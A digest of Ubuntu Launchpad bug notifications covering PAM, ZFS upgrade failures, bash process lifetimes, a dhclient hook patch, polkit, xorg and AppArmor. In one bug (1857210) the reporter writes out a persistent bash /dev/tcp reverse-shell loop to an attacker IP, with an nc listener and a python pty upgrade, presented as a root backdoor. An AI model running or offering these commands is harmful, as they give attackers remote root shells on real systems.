[Touch-packages] [Bug 1860826] Re: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory

2020-01-24 Thread Seth Arnold
** Tags added: champagne

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1860826

Title:
  pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or
  directory

Status in pam package in Ubuntu:
  New

Bug description:
  Hello, after upgrading to focal I found the following in my journalctl
  output:

  Jan 24 23:07:00 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory
  Jan 24 23:07:01 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory

  
  The login package stopped packaging this file:
  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=731656
  and now forcibly removes the file:
  https://paste.ubuntu.com/p/myh9cGWrHD/

  However, the pam package's pam_unix.so module has not yet been adapted to
  ignore this file:
  https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=674857#25

  Thanks

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: libpam-modules 1.3.1-5ubuntu4
  ProcVersionSignature: Ubuntu 5.4.0-9.12-generic 5.4.3
  Uname: Linux 5.4.0-9-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu15
  Architecture: amd64
  Date: Fri Jan 24 23:35:33 2020
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: pam
  UpgradeStatus: Upgraded to focal on 2020-01-24 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/1860826/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1860826] [NEW] pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory

2020-01-24 Thread Seth Arnold
Public bug reported:

Hello, after upgrading to focal I found the following in my journalctl
output:

Jan 24 23:07:00 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory
Jan 24 23:07:01 millbarge sudo[32120]: pam_unix(sudo:auth): Couldn't open /etc/securetty: No such file or directory


The login package stopped packaging this file:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=731656
and now forcibly removes the file:
https://paste.ubuntu.com/p/myh9cGWrHD/

However, the pam package's pam_unix.so module has not yet been adapted to
ignore this file:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=674857#25

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 20.04
Package: libpam-modules 1.3.1-5ubuntu4
ProcVersionSignature: Ubuntu 5.4.0-9.12-generic 5.4.3
Uname: Linux 5.4.0-9-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.11-0ubuntu15
Architecture: amd64
Date: Fri Jan 24 23:35:33 2020
ProcEnviron:
 TERM=rxvt-unicode-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: pam
UpgradeStatus: Upgraded to focal on 2020-01-24 (0 days ago)

** Affects: pam (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug focal



[Touch-packages] [Bug 1860762] Re: Upgrade with zfs-on-root failures

2020-01-24 Thread Seth Arnold
My machine did not reboot successfully; because I followed The Guide, my
system has a root password, and I was prompted for it at the systemd
emergency shell. (Which is super-confusing, because I forgot I had set a
password.)

The error message appeared to be along the lines of "bpool failed to
import because it was most recently used on another machine". (This is a
lie; rpool, on the same nvme, didn't say the same thing.)

I was able to proceed again after a 'zpool import -f bpool', reboot, and
then things seemed to work well.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1860762

Title:
  Upgrade with zfs-on-root failures

Status in initramfs-tools package in Ubuntu:
  New
Status in ubuntu-release-upgrader package in Ubuntu:
  New

Bug description:
  I followed rlaager's howto for installing Ubuntu 18.04 LTS with ZFS
  root (but used disco). I've also set up sanoid to perform periodic
  snapshots of bpool (which stores /boot).

  The upgrade from disco to eoan didn't go well:

  [.. trimmed to fit in the comment box; more context in attachment ..]

  /ubuntu@autosnap_2020-01-24_04:00:05_frequently
  Found initrd image: initrd.img-5.3.0-29-generic in rpool/ROOT/ubuntu@autosnap_2020-01-24_04:00:05_frequently
  Found linux image: vmlinuz-5.0.0-39-generic in rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.0.0-39-generic in rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found linux image: vmlinuz-5.0.0-40-generic in rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.0.0-40-generic in rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found linux image: vmlinuz-5.3.0-29-generic in rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Found initrd image: initrd.img-5.3.0-29-generic in rpool/ROOT/ubuntu@autosnap_2020-01-24_04:15:05_frequently
  Adding boot menu entry for EFI firmware configuration
  done
  Processing triggers for dbus (1.12.14-1ubuntu2) ...
  Processing triggers for initramfs-tools (0.133ubuntu10) ...
  update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
  cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
  cryptsetup: WARNING: Couldn't determine root device
  Error 24 : Write error : cannot write compressed block 
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.3.0-29-generic with 1.
  dpkg: error processing package initramfs-tools (--configure):
   installed initramfs-tools package post-installation script subprocess returned error exit status 1
  Processing triggers for shim-signed (1.39+15+1533136590.3beb971-0ubuntu1) ...
  Nothing to do.
  Processing triggers for libgdk-pixbuf2.0-0:amd64 (2.40.0+dfsg-1build1) ...
  Errors were encountered while processing:
   initramfs-tools
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned an error code (1)

  Could not install the upgrades

  The upgrade has aborted. Your system could be in an unusable state. A 
  recovery will run now (dpkg --configure -a). 

  Setting up initramfs-tools (0.133ubuntu10) ...
  update-initramfs: deferring update (trigger activated)
  Processing triggers for initramfs-tools (0.133ubuntu10) ...
  update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
  ERROR: Cannot create report: [Errno 17] File exists: '/var/crash/initramfs-tools.0.crash'
  cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
  cryptsetup: WARNING: Couldn't determine root device
  Error 24 : Write error : cannot write compressed block 
  E: mkinitramfs failure cpio 141 lz4 -9 -l 24
  update-initramfs: failed for /boot/initrd.img-5.3.0-29-generic with 1.
  dpkg: error processing package initramfs-tools (--configure):
   installed initramfs-tools package post-installation script subprocess returned error exit status 1
  Errors were encountered while processing:
   initramfs-tools

  Upgrade complete

  The upgrade has completed but there were errors during the upgrade 
  process. 

  To continue please press [ENTER]

  ProblemType: Bug
  DistroRelease: Ubuntu 19.10
  Package: ubuntu-release-upgrader-core 1:19.10.15.4
  ProcVersionSignature: Ubuntu 5.0.0-40.44-generic 5.0.21
  Uname: Linux 5.0.0-40-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu8.3
  Architecture: amd64
  CrashDB: ubuntu
  Date: Fri Jan 24 06:02:32 2020
  PackageArchitecture: all
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: ubuntu-release-upgrader
  UpgradeStatus: Upgraded to eoan on 2020-01-24 (0 days ago)
  VarLogDistupgradeAptclonesystemstate.tar.gz:
   Error: command ['pkexec', 'cat', '/var/log/dist-upgrade/apt-clone_system_state.tar.gz'] failed with exit 

[Touch-packages] [Bug 1860762] Re: Upgrade with zfs-on-root failures

2020-01-24 Thread Seth Arnold
I was able to fix this error:

 E: mkinitramfs failure cpio 141 lz4 -9 -l 24

by deleting the snapshots that sanoid made *during* the installation
process:

sarnold@millbarge:/boot$ sudo zfs destroy bpool@autosnap_2020-01-24_04:00:05_hourly%autosnap_2020-01-24_08:45:05_frequently
[sudo] password for sarnold: 
sarnold@millbarge:/boot$ sudo zfs destroy bpool/BOOT@autosnap_2020-01-24_04:00:05_hourly%autosnap_2020-01-24_08:45:05_frequently
sarnold@millbarge:/boot$ sudo zfs destroy bpool/BOOT/ubuntu@autosnap_2020-01-24_04:00:05_hourly%autosnap_2020-01-24_08:45:05_frequently
sarnold@millbarge:/boot$ df -h .
Filesystem         Size  Used Avail Use% Mounted on
bpool/BOOT/ubuntu  365M  156M  210M  43% /boot
sarnold@millbarge:/boot$ sudo dpkg --configure -a
Setting up initramfs-tools (0.133ubuntu10) ...
update-initramfs: deferring update (trigger activated)
Processing triggers for initramfs-tools (0.133ubuntu10) ...
update-initramfs: Generating /boot/initrd.img-5.3.0-29-generic
cryptsetup: ERROR: Couldn't resolve device rpool/ROOT/ubuntu
cryptsetup: WARNING: Couldn't determine root device
sarnold@millbarge:/boot$ 


Considering sanoid is not packaged in Ubuntu, there may not be anything that 
do-release-upgrade or initramfs-tools can do differently.

Thanks


[Touch-packages] [Bug 1860762] Re: Upgrade with zfs-on-root failures

2020-01-24 Thread Seth Arnold
I'm surprised the snapshots showed up, I've got the snapdirs hidden:

$ zfs list -oname,snapdir
NAME                           SNAPDIR
bpool                          hidden
bpool/BOOT                     hidden
bpool/BOOT/ubuntu              hidden
rpool                          hidden
rpool/ROOT                     hidden
rpool/ROOT/ubuntu              hidden
rpool/home                     hidden
rpool/home/root                hidden
rpool/home/sarnold             hidden
rpool/swap                     -
rpool/tmp                      hidden
rpool/usr                      hidden
rpool/usr/local                hidden
rpool/var                      hidden
rpool/var/cache                hidden
rpool/var/lib                  hidden
rpool/var/lib/AccountsService  hidden
rpool/var/lib/docker           hidden
rpool/var/lib/nfs              hidden
rpool/var/lib/schroot          hidden
rpool/var/log                  hidden
rpool/var/mail                 hidden
rpool/var/snap                 hidden
rpool/var/spool                hidden
rpool/var/tmp                  hidden
rpool/var/www                  hidden


** Also affects: initramfs-tools (Ubuntu)
   Importance: Undecided
   Status: New


[Touch-packages] [Bug 1857210] Re: process does not close when shell is killed

2020-01-07 Thread Seth Arnold
Hello Mitch, excellent report, thanks.

This is working as intended.

The Unix process model is complicated, and Linux has added a few
additional complications on top; I'll try to summarize it but it's just
not going to be easy.

When a parent process exits, child processes are not notified by
default. The prctl(2) syscall allows a process to be informed when its
parent exits. There is no easy mechanism for grand-children to be
informed when a grand-parent process exits.

bash will send signals to all currently running jobs when it exits. (You
can ask bash to skip sending a signal to a job by using the 'disown'
shell built-in.) These signals can only be sent if bash continues to run
when exiting -- using 'kill -9' in your example above prevents bash from
sending signals to its children because a process cannot handle SIGKILL.
Try it again with SIGHUP instead of SIGKILL. Processes can ignore or
block the SIGHUP signal that bash will send.

It is expected that killing a parent process may not influence child
processes. If you want to kill a process that has a socket open, you
should kill that process directly. ss(8), lsof(8), fuser(1), etc can
report which processes are using a given socket.

For more details check the signal(7) manpage, bash(1) manpage near
'disown', the prctl(2) manpage near 'PR_SET_PDEATHSIG'. The book
Advanced Programming in the Unix Environment also has an excellent
description of the Unix process lifecycle.

Thanks
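
The default described above (children are not told when their parent dies) and the prctl(2) opt-in, as an added C example that is not part of the original reply or of bash: a stand-in "shell" starts one job and is then killed with SIGKILL, and the function reports whether the job is still alive afterwards. The names orphan_survives, run_shell and run_job are made up for the illustration; the job asks for SIGKILL as its parent-death signal so the result does not depend on inherited signal dispositions.

```c
#define _GNU_SOURCE
#include <poll.h>
#include <signal.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The job started by the stand-in shell. Never returns. */
static void run_job(int report_fd, pid_t shell_pid, int use_pdeathsig)
{
    if (use_pdeathsig) {
        /* Opt in: the kernel sends this signal when the parent dies.
         * SIGTERM would work too and would let the job clean up. */
        if (prctl(PR_SET_PDEATHSIG, SIGKILL) < 0)
            _exit(2);
        /* The parent may already have died before prctl() took effect. */
        if (getppid() != shell_pid)
            _exit(0);
    }
    /* Tell the observer our pid; keeping report_fd open marks us as alive. */
    pid_t me = getpid();
    if (write(report_fd, &me, sizeof me) != (ssize_t)sizeof me)
        _exit(2);
    for (;;)
        pause();
}

/* Stand-in for bash: starts one job, then waits to be killed. Never returns. */
static void run_shell(int report_fd, int use_pdeathsig)
{
    pid_t self = getpid();
    pid_t job = fork();
    if (job < 0)
        _exit(2);
    if (job == 0)
        run_job(report_fd, self, use_pdeathsig);
    close(report_fd);
    for (;;)
        pause();
}

/* Returns 1 if the job outlived its SIGKILLed parent, 0 if it died with
 * the parent, -1 on setup failure. */
int orphan_survives(int use_pdeathsig)
{
    int pfd[2];
    if (pipe(pfd) < 0)
        return -1;

    pid_t shell = fork();
    if (shell < 0) {
        close(pfd[0]);
        close(pfd[1]);
        return -1;
    }
    if (shell == 0) {
        close(pfd[0]);
        run_shell(pfd[1], use_pdeathsig);
    }
    close(pfd[1]);

    /* Wait until the job is running and has reported its pid. */
    pid_t job = -1;
    ssize_t n = read(pfd[0], &job, sizeof job);

    /* SIGKILL cannot be caught, so the shell gets no chance to signal its job. */
    kill(shell, SIGKILL);
    waitpid(shell, NULL, 0);
    if (n != (ssize_t)sizeof job) {
        close(pfd[0]);
        return -1;
    }

    /* The job holds the only remaining write end of the pipe: a hang-up
     * means it exited, a timeout means it is still running as an orphan. */
    struct pollfd p = { .fd = pfd[0], .events = POLLIN };
    int survived = (poll(&p, 1, 1000) == 0);
    if (survived)
        kill(job, SIGKILL);   /* kill the process directly, as the reply advises */
    close(pfd[0]);
    return survived;
}

int main(void)
{
    printf("default:          job survives = %d\n", orphan_survives(0));
    printf("PR_SET_PDEATHSIG: job survives = %d\n", orphan_survives(1));
    return 0;
}
```
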


[Touch-packages] [Bug 1857210] Re: process does not close when shell is killed

2020-01-07 Thread Seth Arnold
** Information type changed from Private Security to Public

** Changed in: bash (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1857210

Title:
  process does not close when shell is killed

Status in bash package in Ubuntu:
  Invalid

Bug description:
  [*] As root user only - use your attacker IP and port of your choice.

  [*] Victim server/client
  while true; do
  0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
  sleep 30
  done

  
  [*] Attacker Machine
  nc -lvnp 80 #  Or whatever port you plugged into the while loop

  
  Once the while loop is executed, you can close the shell (do not kill with
  Control+C) and the while loop will continue to run. You can attempt to run a
  "Kill -9" on the pid but the thread below will take over as running process.
  This leaves a hard to detect reverse shell since the while loop continues to
  run and executes a rooted backdoor call every 30 seconds. Example below:

  [*] Victim
  root@app-server:~# while true; do
  > 0<&196;exec 196<>/dev/tcp/192.168.1.111/9000; sh <&196 >&196 2>&196
  > sleep 30
  > done
  bash: 196: Bad file descriptor
  bash: connect: Connection refused
  bash: /dev/tcp/192.168.1.111/9000: Connection refused
  bash: 196: Bad file descriptor
  bash: 196: Bad file descriptor
  bash: connect: Connection refused
  bash: /dev/tcp/192.168.1.111/9000: Connection refused
  bash: 196: Bad file descriptor
  bash: 196: Bad file descriptor


  
  [*] Attacker Machine
  codonnell@codonnell-Precision-WorkStation-T5500:~$ nc -lvnp 9000
  Listening on [0.0.0.0] (family 0, port 9000)
  Connection from 192.168.122.183 41640 received!
  whoami
  root

  
  * Now we close out the terminal on the Victim machine

  We can see the call continues:
  codonnell@codonnell-Precision-WorkStation-T5500:~$ nc -lvnp 9000
  Listening on [0.0.0.0] (family 0, port 9000)
  Connection from 192.168.122.183 41644 received!
  whoami
  root
  python -c 'import pty; pty.spawn("/bin/bash")'
  root@app-server:~# 

  
  Now checking the Victim process, we can see the process, let's kill it:
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1323     1  0 17:42 ?      00:00:00 su
  root  1324  1323  0 17:42 ?      00:00:00  \_ bash
  root  1346  1324  0 17:46 ?      00:00:00  \_ sh
  root  1350  1346  0 17:46 ?      00:00:00  \_ python -c import pty; pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/2  00:00:00  \_ /bin/bash

  codonnell@app-server:~$ kill -9 1323
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1324     1  0 17:42 ?      00:00:00 bash
  root  1346  1324  0 17:46 ?      00:00:00  \_ sh
  root  1350  1346  0 17:46 ?      00:00:00  \_ python -c import pty; pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/2  00:00:00  \_ /bin/bash

  codonnell@app-server:~$ sudo kill -9 1324
  [sudo] password for codonnell: 
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1346     1  0 17:46 ?      00:00:00 sh
  root  1350  1346  0 17:46 ?      00:00:00  \_ python -c import pty; pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/2  00:00:00  \_ /bin/bash

  
  We can see the below thread moves up the chain. All while I am on the system:

  codonnell@app-server:~$ sudo kill -9 1346
  codonnell@app-server:~$ ps -aef --forest | less
  ..
  root  1350     1  0 17:46 ?      00:00:00 python -c import pty; pty.spawn("/bin/bash")
  root  1351  1350  0 17:46 pts/2  00:00:00  \_ /bin/bash

  codonnell@app-server:~$ sudo kill -1350
  codonnell@app-server:~$ ps -aef --forest | less

  The kill -9 has now killed the Attacker shell and the while loop has
  ended.

  codonnell@codonnell-Precision-WorkStation-T5500:~$ nc -lvnp 9000
  Listening on [0.0.0.0] (family 0, port 9000)
  Connection from 192.168.122.183 41644 received!
  whoami
  root
  python -c 'import pty; pty.spawn("/bin/bash")'
  root@app-server:~#

  
  My guess is that killing the root process should remove the below threads to
  avoid a continuous open backdoor on the server.

  Tested on RHEL as well, this seems to be specific to the Bash package.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: bash 4.4.18-2ubuntu1.2
  ProcVersionSignature: Ubuntu 4.15.0-72.81-generic 4.15.18
  Uname: Linux 4.15.0-72-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.9
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Sat Dec 21 17:34:54 2019
  InstallationDate: Installed on 2019-01-31 (324 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: bash
  UpgradeStatus: No upgrade log present 

[Touch-packages] [Bug 1853164] Re: systemd: /etc/dhcp/dhclient-enter-hooks.d/resolved error

2019-11-21 Thread Seth Arnold
I thought we were going to some effort to reduce the number of systems
where resolvconf was going to be used, or even remove it from the
distro entirely.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1853164

Title:
  systemd: /etc/dhcp/dhclient-enter-hooks.d/resolved error

Status in systemd package in Ubuntu:
  Triaged
Status in systemd source package in Focal:
  Triaged

Bug description:
  The functionality exists to allow users to revert to the traditional ifupdown 
  package for network configuration. Alongside this, systemd's often-buggy 
  resolver can be disabled. However, there's a logic error in the systemd-
  supplied /etc/dhcp/dhclient-enter-hooks.d/resolved that prevents the system
  from populating /etc/resolv.conf properly when systemd-resolved is disabled. 
  The issue is here:

  if [ -x /lib/systemd/systemd-resolved ] ; then

  Instead of checking to see if the systemd-resolved service is enabled or 
  active, which would be the correct behaviour, this checks for the existence of
  a binary, assuming that if it exists it's supposed to be used.

  I've not tested this in the absence of resolvconf, but if systemd-resolved
  isn't enabled, it's difficult to imagine this code wanting to run. I've
  tested this with resolvconf and ifupdown driving dhclient, and it corrects
  the behaviour that was broken with the introduction of systemd-resolved.

  I'm attaching a patch, and am also including it here for easy access:

  *** resolved.broken 2019-11-19 15:01:28.785588838 +
  --- resolved2019-11-19 15:08:06.519430073 +
  ***
  *** 14,20 
#   (D) = master script downs interface
#   (-) = master script does nothing with this

  ! if [ -x /lib/systemd/systemd-resolved ] ; then
# For safety, first undefine the nasty default make_resolv_conf()
make_resolv_conf() { : ; }
case "$reason" in
  --- 14,21 
#   (D) = master script downs interface
#   (-) = master script does nothing with this

  ! systemctl is-active systemd-resolved > /dev/null 2>&1
  ! if [ $? -eq 0 ]; then
# For safety, first undefine the nasty default make_resolv_conf()
make_resolv_conf() { : ; }
case "$reason" in
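
Review bot: the new test in the second half of the hunk splits the check across two lines ('systemctl is-active systemd-resolved > /dev/null 2>&1' followed by 'if [ $? -eq 0 ]; then'), which silently breaks if a command is ever inserted between them, and it tests only is-active although the description names "enabled or active" as the condition. Suggest testing the exit status directly with 'if systemctl is-active --quiet systemd-resolved; then' and adding a comment above it saying why is-active was chosen over is-enabled, since a dhclient run that happens before systemd-resolved has started would skip the make_resolv_conf override even on a system where resolved is enabled. The description says this was tested only with resolvconf and ifupdown, so the no-resolvconf case still needs a test.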

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1853164/+subscriptions



[Touch-packages] [Bug 1850977] Re: Snap installs software without user having sudo access

2019-11-14 Thread Seth Arnold
Maciej, that looks like javascript polkit and I believe we're staying on
the pre-javascript version of polkit.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to policykit-1 in Ubuntu.
https://bugs.launchpad.net/bugs/1850977

Title:
  Snap installs software without user having sudo access

Status in gnome-software package in Ubuntu:
  Invalid
Status in policykit-1 package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  Invalid

Bug description:
  $ lsb_release -rd
  Description:  Ubuntu 18.04.2 LTS
  Release:  18.04

  $ apt-cache policy gnome-software
  gnome-software:
Installed: 3.28.1-0ubuntu4.18.04.8
Candidate: 3.28.1-0ubuntu4.18.04.12
Version table:
   3.28.1-0ubuntu4.18.04.12 500
  500 http://us.archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages
   *** 3.28.1-0ubuntu4.18.04.8 100
  100 /var/lib/dpkg/status
   3.28.1-0ubuntu4 500
  500 http://us.archive.ubuntu.com/ubuntu bionic/main amd64

  What I expect to happen:
Software is not installed for a user without sudo access.

  What does happen:
  I'm logging in with an LDAP user. This user does not have sudo access.

  When I select software from gnome-software ("Ubuntu Software"), it
  pops up and asks for my user's password. I enter this in, and the
  software then installs (tested with blender, libreoffice, opencl
  driver).

  My user does *not* have sudo access on the system.

  $ sudo su -
  [sudo] password for jason: 
  jason is not in the sudoers file.  This incident will be reported.

  It appears these *may* be being installed with Snaps ... which still:

  How, without having root access, can an unprivileged user install
  something onto the system?

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: gnome-software 3.28.1-0ubuntu4.18.04.8
  ProcVersionSignature: Ubuntu 5.0.0-32.34~18.04.2-generic 5.0.21
  Uname: Linux 5.0.0-32-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Fri Nov  1 13:53:03 2019
  InstallationDate: Installed on 2019-11-01 (0 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 (20190210)
  InstalledPlugins:
   gnome-software-plugin-flatpak N/A
   gnome-software-plugin-limba   N/A
   gnome-software-plugin-snap    3.28.1-0ubuntu4.18.04.8
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: gnome-software
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-software/+bug/1850977/+subscriptions



[Touch-packages] [Bug 1851865] Re: bug reporrt

2019-11-08 Thread Seth Arnold
Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1851865

Title:
  bug reporrt

Status in xorg package in Ubuntu:
  New

Bug description:
  Not sure

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: xorg 1:7.7+13ubuntu3.1
  ProcVersionSignature: Ubuntu 4.15.0-68.77~16.04.1-generic 4.15.18
  Uname: Linux 4.15.0-68-generic x86_64
  NonfreeKernelModules: wl
  ApportVersion: 2.20.1-0ubuntu2.21
  Architecture: amd64
  CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Thu Nov  7 22:17:53 2019
  DistUpgraded: 2019-11-07 17:58:35,255 DEBUG /openCache(), new cache size 90136
  DistroCodename: xenial
  DistroVariant: ubuntu
  DkmsStatus:
   bcmwl, 6.30.223.271+bdcom, 4.15.0-66-generic, x86_64: installed
   bcmwl, 6.30.223.271+bdcom, 4.15.0-68-generic, x86_64: installed
   virtualbox, 5.1.38, 4.15.0-66-generic, x86_64: installed
   virtualbox, 5.1.38, 4.15.0-68-generic, x86_64: installed
  ExtraDebuggingInterest: Yes, including running git bisection searches
  GraphicsCard:
   Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller [8086:2a42] (rev 07) (prog-if 00 [VGA controller])
     Subsystem: Dell Mobile 4 Series Chipset Integrated Graphics Controller [1028:02a0]
     Subsystem: Dell Mobile 4 Series Chipset Integrated Graphics Controller [1028:02a0]
  InstallationDate: Installed on 2019-11-04 (3 days ago)
  InstallationMedia: Ubuntu-GNOME 16.04.5 LTS "Xenial Xerus" - Release amd64 (20180731)
  MachineType: Dell Inc. Studio 1737
  ProcEnviron:
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-68-generic root=UUID=28143eaf-551d-47e2-90aa-bfd9fb618e90 ro quiet splash vt.handoff=7
  SourcePackage: xorg
  UpgradeStatus: Upgraded to xenial on 2019-11-07 (0 days ago)
  dmi.bios.date: 04/14/2011
  dmi.bios.vendor: Dell Inc.
  dmi.bios.version: A09
  dmi.board.name: 0P792H
  dmi.board.vendor: Dell Inc.
  dmi.board.version: A09
  dmi.chassis.type: 8
  dmi.chassis.vendor: Dell Inc.
  dmi.chassis.version: A09
  dmi.modalias: dmi:bvnDellInc.:bvrA09:bd04/14/2011:svnDellInc.:pnStudio1737:pvrA09:rvnDellInc.:rn0P792H:rvrA09:cvnDellInc.:ct8:cvrA09:
  dmi.product.name: Studio 1737
  dmi.product.version: A09
  dmi.sys.vendor: Dell Inc.
  version.compiz: compiz N/A
  version.ia32-libs: ia32-libs N/A
  version.libdrm2: libdrm2 2.4.91-2~16.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 18.0.5-0ubuntu0~16.04.1
  version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
  version.libgl1-mesa-glx: libgl1-mesa-glx 18.0.5-0ubuntu0~16.04.1
  version.xserver-xorg-core: xserver-xorg-core N/A
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A
  version.xserver-xorg-video-ati: xserver-xorg-video-ati N/A
  version.xserver-xorg-video-intel: xserver-xorg-video-intel N/A
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau N/A

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1851865/+subscriptions



[Touch-packages] [Bug 1851661] Re: AppArmor denied operation open to snap pick-colour-picker

2019-11-07 Thread Seth Arnold
Hello Douglas, thanks for the report. AppArmor is one of several tools
the snap packaging system uses to enforce confinement on packages. The
AppArmor project doesn't supply the policy though, just the enforcement
mechanism. I believe you'll need to talk to whoever wrote the snap
package, as they request the privileges necessary when packaging the
application.

Try 'snap info' on the name of the snap package that provides the colour
picker; it should provide some contact details for the packager.

Thanks

** Changed in: apparmor (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1851661

Title:
  AppArmor denied operation open to snap pick-colour-picker

Status in apparmor package in Ubuntu:
  Invalid

Bug description:
  I've written an issue here:
  https://github.com/stuartlangridge/ColourPicker/issues/63

  Pick (a color picker distributed as a snap) will not launch. The
  creator of the application believes this to be a problem with my
  system, not with their app. Apparently, AppArmor is preventing it from
  starting. I'm not familiar with this MAC implementation, but the logs
  suggest that this is the problem. See the attachment.

  ```
  nov 07 11:18:29 alq22 audit[27542]: AVC apparmor="DENIED" operation="open" profile="snap.pick-colour-picker.pick-colour-picker" name="/proc/27542/mounts" pid=27542 comm="python3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  nov 07 11:18:29 alq22 kernel: audit: type=1400 audit(1573136309.796:304): apparmor="DENIED" operation="open" profile="snap.pick-colour-picker.pick-colour-picker" name="/proc/27542/mounts" pid=27542 comm="python3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  ```

